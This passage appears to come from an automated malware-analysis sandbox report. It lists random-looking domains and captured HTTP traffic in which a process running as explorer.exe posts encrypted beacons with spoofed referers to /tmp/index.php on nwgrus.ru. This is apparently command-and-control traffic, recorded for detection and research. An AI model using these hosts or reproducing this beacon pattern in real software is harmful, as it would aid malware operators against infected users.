                                        • xlakrjktmvagfqhe.org
                                        • cvqgcpbdqadirwgw.org
                                        • rhtihevserv.org
                                        • xvhoixsulem.com
                                        • eywbfvbvilup.net
                                        • garnufhrqshsv.net
                                        • jpqykkhyhkjhpkd.org
                                        • ctxuhanhwfs.org
                                        • ncglteyuwoqfog.org
                                        • uknyifxswcdyll.com
                                        • pxdktwwwgewqlyba.org
                                        • emasrygonyft.com
                                        • pwvfxidmiqrrd.org
                                        • gcmljhlsnyknod.org
                                        • emsfvchaaieje.net
                                        • goboxcgfexx.net
                                        • ruprlmkhoul.com
                                        • isbmdtufnkfjsgc.net
                                        • dkfsbqntnihxbnlu.com
                                        • aiwrtqoespykiwu.com
                                        • isyxarorgwntyxfd.net
                                        • busntnknves.org
                                        • ewcutxkdkeyvacp.net
                                        • lwocwqbtqohnf.org
                                        • tiisncfdrpaiu.org
                                        • gieumfrwvwjruuah.com
                                        • hkihwrdtvsi.org
                                        • bqpiqprsuajpd.net
                                        • fsqorqnhaeehy.org
                                        • eihhylujhlro.com
                                        • qcgaudpuoiuttos.org
                                        • mhqikqiwjyotw.com
                                        • dymavinnaeuaxxm.org
                                        • xuqynkrewbaraj.net
                                        • niarphxxbktdxvwh.net
                                        • lqpnyjpucaq.com
                                        • akokgrlutaukqvq.org

                                        HTTP Packets

                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        0192.168.2.549770105.197.97.247801028C:\Windows\explorer.exe
                                        TimestampBytes transferredDirectionData
                                        Oct 7, 2024 14:59:23.357438087 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        Accept: */*
                                        Referer: http://bmrvdxbbdeon.com/
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Content-Length: 338
                                        Host: nwgrus.ru
                                        Oct 7, 2024 14:59:23.357517004 CEST338OUTData Raw: 3b 6e 25 19 8d bf 1c 2e de a8 b4 06 05 03 79 b7 7f 79 bc 94 63 03 94 10 7d 7e 7a 9d 47 b6 c0 1a e8 5b cf 2e 76 6f 52 6d 9c 97 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 56 29 a6 e9
                                        Data Ascii: ;n%.yyc}~zG[.voRm?#1|J7 M@NA .[k,vuV)D~~cRc)n%m8g83NM4\Yhy&F>MfwT<C-&KPG`ZDWitC5
                                        Oct 7, 2024 14:59:24.450309992 CEST152INHTTP/1.1 404 Not Found
                                        Server: nginx/1.26.0
                                        Date: Mon, 07 Oct 2024 12:59:24 GMT
                                        Content-Type: text/html; charset=utf-8
                                        Connection: close
                                        Data Raw: 04 00 00 00 72 e8 87 ee
                                        Data Ascii: r


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        1192.168.2.549776105.197.97.247801028C:\Windows\explorer.exe
                                        TimestampBytes transferredDirectionData
                                        Oct 7, 2024 14:59:24.462007999 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        Accept: */*
                                        Referer: http://hkxxphsdfyiakovt.org/
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Content-Length: 350
                                        Host: nwgrus.ru
                                        Oct 7, 2024 14:59:24.462030888 CEST350OUTData Raw: 3b 6e 25 19 8d bf 1c 2e de a8 b4 06 05 03 79 b7 7f 79 bc 94 63 03 94 10 7d 7e 7a 9d 47 b6 c0 1a e8 5b cf 2e 76 6f 52 6d 9c 97 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0a 6b 2c 90 f5 76 0b 75 7f 43 f9 e2
                                        Data Ascii: ;n%.yyc}~zG[.voRm?#1|J7 M@NA -[k,vuCHMPWtorGa6^gm\_TPgc6Uxp-4hjLG"[T`lbU;3&wvM4MF4s
                                        Oct 7, 2024 14:59:25.373585939 CEST484INHTTP/1.1 404 Not Found
                                        Server: nginx/1.26.0
                                        Date: Mon, 07 Oct 2024 12:59:25 GMT
                                        Content-Type: text/html; charset=utf-8
                                        Connection: close
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        2192.168.2.549782105.197.97.247801028C:\Windows\explorer.exe
                                        TimestampBytes transferredDirectionData
                                        Oct 7, 2024 14:59:25.383702993 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        Accept: */*
                                        Referer: http://hgegifhrmen.com/
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Content-Length: 174
                                        Host: nwgrus.ru
                                        Oct 7, 2024 14:59:25.383718967 CEST174OUTData Raw: 3b 6e 25 19 8d bf 1c 2e de a8 b4 06 05 03 79 b7 7f 79 bc 94 63 03 94 10 7d 7e 7a 9d 47 b6 c0 1a e8 5b cf 2e 76 6f 52 6d 9c 97 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0b 6b 2c 90 f5 76 0b 75 27 04 b3 8a
                                        Data Ascii: ;n%.yyc}~zG[.voRm?#1|J7 M@NA -[k,vu'oLUb6JsFEe[s>R~"UO}8Ju?aY0cz
                                        Oct 7, 2024 14:59:26.313987970 CEST484INHTTP/1.1 404 Not Found
                                        Server: nginx/1.26.0
                                        Date: Mon, 07 Oct 2024 12:59:26 GMT
                                        Content-Type: text/html; charset=utf-8
                                        Connection: close
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        3192.168.2.549788105.197.97.247801028C:\Windows\explorer.exe
                                        TimestampBytes transferredDirectionData
                                        Oct 7, 2024 14:59:26.323055029 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        Accept: */*
                                        Referer: http://jqmiciumjrg.org/
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Content-Length: 142
                                        Host: nwgrus.ru
                                        Oct 7, 2024 14:59:26.323072910 CEST142OUTData Raw: 3b 6e 25 19 8d bf 1c 2e de a8 b4 06 05 03 79 b7 7f 79 bc 94 63 03 94 10 7d 7e 7a 9d 47 b6 c0 1a e8 5b cf 2e 76 6f 52 6d 9c 97 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 08 6b 2c 90 f5 76 0b 75 3b 47 d5 a1
                                        Data Ascii: ;n%.yyc}~zG[.voRm?#1|J7 M@NA -[k,vu;GSF~\Q/8C+r/(@^|FdWV
                                        Oct 7, 2024 14:59:27.264467001 CEST137INHTTP/1.1 200 OK
                                        Server: nginx/1.26.0
                                        Date: Mon, 07 Oct 2024 12:59:27 GMT
                                        Content-Type: text/html; charset=utf-8
                                        Connection: close


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        4192.168.2.549794105.197.97.247801028C:\Windows\explorer.exe
                                        TimestampBytes transferredDirectionData
                                        Oct 7, 2024 14:59:27.273969889 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        Accept: */*
                                        Referer: http://xlakrjktmvagfqhe.org/
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Content-Length: 259
                                        Host: nwgrus.ru
                                        Oct 7, 2024 14:59:27.273998022 CEST259OUTData Raw: 3b 6e 25 19 8d bf 1c 2e de a8 b4 06 05 03 79 b7 7f 79 bc 94 63 03 94 10 7d 7e 7a 9d 47 b6 c0 1a e8 5b cf 2e 76 6f 52 6d 9c 97 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 09 6b 2c 90 f5 76 0b 75 67 39 b7 90
                                        Data Ascii: ;n%.yyc}~zG[.voRm?#1|J7 M@NA -[k,vug9?xXK}r^bs6CP#a*@|gZ"By BFi?FkAF{,0PqQdCU+YY%*_u
                                        Oct 7, 2024 14:59:28.191555023 CEST484INHTTP/1.1 404 Not Found
                                        Server: nginx/1.26.0
                                        Date: Mon, 07 Oct 2024 12:59:28 GMT
                                        Content-Type: text/html; charset=utf-8
                                        Connection: close
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        5192.168.2.549804105.197.97.247801028C:\Windows\explorer.exe
                                        TimestampBytes transferredDirectionData
                                        Oct 7, 2024 14:59:28.202608109 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        Accept: */*
                                        Referer: http://cvqgcpbdqadirwgw.org/
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Content-Length: 169
                                        Host: nwgrus.ru
                                        Oct 7, 2024 14:59:28.202627897 CEST169OUTData Raw: 3b 6e 25 19 8d bf 1c 2e de a8 b4 06 05 03 79 b7 7f 79 bc 94 63 03 94 10 7d 7e 7a 9d 47 b6 c0 1a e8 5b cf 2e 76 6f 52 6d 9c 97 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0e 6b 2c 90 f5 76 0b 75 41 55 e6 94
                                        Data Ascii: ;n%.yyc}~zG[.voRm?#1|J7 M@NA -[k,vuAUVGxtee2e5vkGdHe\OD9(CHx;MN{=P#Ql
                                        Oct 7, 2024 14:59:29.129834890 CEST137INHTTP/1.1 200 OK
                                        Server: nginx/1.26.0
                                        Date: Mon, 07 Oct 2024 12:59:28 GMT
                                        Content-Type: text/html; charset=utf-8
                                        Connection: close


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        6192.168.2.549810105.197.97.247801028C:\Windows\explorer.exe
                                        TimestampBytes transferredDirectionData
                                        Oct 7, 2024 14:59:29.138952017 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        Accept: */*
                                        Referer: http://rhtihevserv.org/
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Content-Length: 178
                                        Host: nwgrus.ru
                                        Oct 7, 2024 14:59:29.138984919 CEST178OUTData Raw: 3b 6e 25 19 8d bf 1c 2e de a8 b4 06 05 03 79 b7 7f 79 bc 94 63 03 94 10 7d 7e 7a 9d 47 b6 c0 1a e8 5b cf 2e 76 6f 52 6d 9c 97 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0f 6b 2c 90 f5 76 0b 75 5d 04 b7 a2
                                        Data Ascii: ;n%.yyc}~zG[.voRm?#1|J7 M@NA -[k,vu]jUqiQt/D|)@xEwIF>}GTHt;R~[UEjQO
                                        Oct 7, 2024 14:59:30.253298998 CEST137INHTTP/1.1 200 OK
                                        Server: nginx/1.26.0
                                        Date: Mon, 07 Oct 2024 12:59:29 GMT
                                        Content-Type: text/html; charset=utf-8
                                        Connection: close


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        7192.168.2.549814105.197.97.247801028C:\Windows\explorer.exe
                                        TimestampBytes transferredDirectionData
                                        Oct 7, 2024 14:59:30.263648987 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        Accept: */*
                                        Referer: http://xvhoixsulem.com/
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Content-Length: 149
                                        Host: nwgrus.ru
                                        Oct 7, 2024 14:59:30.263648987 CEST149OUTData Raw: 3b 6e 25 19 8d bf 1c 2e de a8 b4 06 05 03 79 b7 7f 79 bc 94 63 03 94 10 7d 7e 7a 9d 47 b6 c0 1a e8 5b cf 2e 76 6f 52 6d 9c 97 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0c 6b 2c 90 f5 76 0b 75 67 43 d1 8c
                                        Data Ascii: ;n%.yyc}~zG[.voRm?#1|J7 M@NA -[k,vugCe[nriMo({rjXc[CkOTV-I;*.`
                                        Oct 7, 2024 14:59:31.175985098 CEST484INHTTP/1.1 404 Not Found
                                        Server: nginx/1.26.0
                                        Date: Mon, 07 Oct 2024 12:59:31 GMT
                                        Content-Type: text/html; charset=utf-8
                                        Connection: close
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        8192.168.2.549822105.197.97.247801028C:\Windows\explorer.exe
                                        TimestampBytes transferredDirectionData
                                        Oct 7, 2024 14:59:31.185761929 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        Accept: */*
                                        Referer: http://eywbfvbvilup.net/
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Content-Length: 196
                                        Host: nwgrus.ru
                                        Oct 7, 2024 14:59:31.185786009 CEST196OUTData Raw: 3b 6e 25 19 8d bf 1c 2e de a8 b4 06 05 03 79 b7 7f 79 bc 94 63 03 94 10 7d 7e 7a 9d 47 b6 c0 1a e8 5b cf 2e 76 6f 52 6d 9c 97 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0d 6b 2c 90 f5 76 0b 75 64 54 fd aa
                                        Data Ascii: ;n%.yyc}~zG[.voRm?#1|J7 M@NA -[k,vudTKLNY8o_|(yRX~`z2C1s33RX0I{r)dy2'<r'Y
                                        Oct 7, 2024 14:59:32.218347073 CEST484INHTTP/1.1 404 Not Found
                                        Server: nginx/1.26.0
                                        Date: Mon, 07 Oct 2024 12:59:32 GMT
                                        Content-Type: text/html; charset=utf-8
                                        Connection: close
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        9192.168.2.549831105.197.97.247801028C:\Windows\explorer.exe
                                        TimestampBytes transferredDirectionData
                                        Oct 7, 2024 14:59:32.228586912 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        Accept: */*
                                        Referer: http://garnufhrqshsv.net/
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Content-Length: 251
                                        Host: nwgrus.ru
                                        Oct 7, 2024 14:59:32.228606939 CEST251OUTData Raw: 3b 6e 25 19 8d bf 1c 2e de a8 b4 06 05 03 79 b7 7f 79 bc 94 63 03 94 10 7d 7e 7a 9d 47 b6 c0 1a e8 5b cf 2e 76 6f 52 6d 9c 97 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 02 6b 2c 90 f5 76 0b 75 67 09 e3 f5
                                        Data Ascii: ;n%.yyc}~zG[.voRm?#1|J7 M@NA -[k,vuge`Z}10_LccWeJ*|+=TF1DW(Mj.h"BW8)N&Rks9#Ge]2f{]4OA|,oC/
                                        Oct 7, 2024 14:59:33.173722982 CEST137INHTTP/1.1 200 OK
                                        Server: nginx/1.26.0
                                        Date: Mon, 07 Oct 2024 12:59:33 GMT
                                        Content-Type: text/html; charset=utf-8
                                        Connection: close


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        10192.168.2.549837105.197.97.247801028C:\Windows\explorer.exe
                                        TimestampBytes transferredDirectionData
                                        Oct 7, 2024 14:59:33.182248116 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        Accept: */*
                                        Referer: http://jpqykkhyhkjhpkd.org/
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Content-Length: 186
                                        Host: nwgrus.ru
                                        Oct 7, 2024 14:59:33.182384968 CEST186OUTData Raw: 3b 6e 25 19 8d bf 1c 2e de a8 b4 06 05 03 79 b7 7f 79 bc 94 63 03 94 10 7d 7e 7a 9d 47 b6 c0 1a e8 5b cf 2e 76 6f 52 6d 9c 97 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 03 6b 2c 90 f5 76 0b 75 54 1c ff eb
                                        Data Ascii: ;n%.yyc}~zG[.voRm?#1|J7 M@NA -[k,vuTZMk{a3%E.!5p@o)W\HJA"**RY+eG6DF
                                        Oct 7, 2024 14:59:34.105287075 CEST484INHTTP/1.1 404 Not Found
                                        Server: nginx/1.26.0
                                        Date: Mon, 07 Oct 2024 12:59:33 GMT
                                        Content-Type: text/html; charset=utf-8
                                        Connection: close
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        11192.168.2.549844105.197.97.247801028C:\Windows\explorer.exe
                                        TimestampBytes transferredDirectionData
                                        Oct 7, 2024 14:59:34.116712093 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        Accept: */*
                                        Referer: http://ctxuhanhwfs.org/
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Content-Length: 326
                                        Host: nwgrus.ru
